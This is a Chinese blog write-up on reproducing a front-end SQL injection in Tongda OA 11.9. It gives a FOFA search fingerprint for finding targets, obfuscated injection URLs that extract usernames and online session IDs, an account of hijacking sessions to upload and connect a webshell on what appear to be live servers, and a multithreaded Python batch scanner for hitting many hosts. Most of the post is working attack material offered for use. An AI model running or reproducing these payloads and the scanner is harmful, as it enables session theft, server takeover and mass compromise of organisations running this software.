通达oa11.9前台注入

    漏洞复现   漏洞复现

0x01 前言

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。

通达oa前台存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息,服务器权限等。

0x02 漏洞版本

通达oa 11.9

0x03 fofa语法

icon_hash="-759108386"或者 "tongda.ico"

0x04 漏洞复现

查询online的uid与sid的字段。通过恶意的payload构造

/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 whe\re 1={`\='` 1} un\ion (s\elect user_name,byname fr\om user whe\re 1\={`=` 1})-- '

image-20211011230731276

此命令可以成功获取到在线用户的cookie,从而进行复制用户cookie,自定义利用工具进行后台文件上传漏洞进行getshell

/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 whe\re 1={`\='` 1} un\ion (s\elect uid,sid fr\om user_online whe\re 1\={`=` 1})-- '

image-20211011232455034

最终使用工具进行上传shell

image-20211011232800715

使用冰蝎进行连接,成功获取到webshell

image-20211011233506578

准备删个马准备跑路,发现这才是跑马场

image-20211011234021335

马子太多了,可怜的通达oa

image-20211011234618785

0x05 批量poc

# -*- coding: utf-8 -*-
# @Date     :2021/10/11 22:36
# @Author   :AD钙奶

from queue import Queue
from threading import Thread, activeCount
import requests
import ssl
from urllib3.exceptions import InsecureRequestWarning
ssl._create_default_https_context = ssl._create_unverified_context
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# 漏洞版本
# 通达oa 11.9

def _POC(target_url):
    core_url = target_url + "/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 whe\\re 1={`\='` 1} un\ion (s\elect uid,sid fr\om user_online whe\\re 1\={`=` 1})-- '"
    data = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Connection': 'close',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Length': '1244',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    try:
        response = requests.get(url=core_url, timeout=10, data=data, verify=False)
        if response.status_code == 200 and '1;1' in response.text:
            print("\033[36m[+] 存在SQL注入漏洞 : {} \033[0m".format(target_url))
            save_vuln(target_url)
    except Exception as e:
        pass


def get_file_url():
    with open('url.txt', 'r', encoding='utf-8') as f:
        urls = f.readlines()
    url = [url.strip() for url in urls if url and url.strip()]
    return url


def save_vuln(url):
    urls = url + '\n'
    with open('result.txt','a') as ff:
        ff.write(urls)


def main():
    url = get_file_url()
    queue = Queue(maxsize=0)
    for urls in url:
        queue.put(urls)
    while queue.qsize() > 0:
        if activeCount() <= 50:
            Thread(target=_POC, args=(queue.get(),)).start()


if __name__ == '__main__':
    main()

AD钙奶

Good Good Study, Day Day Up~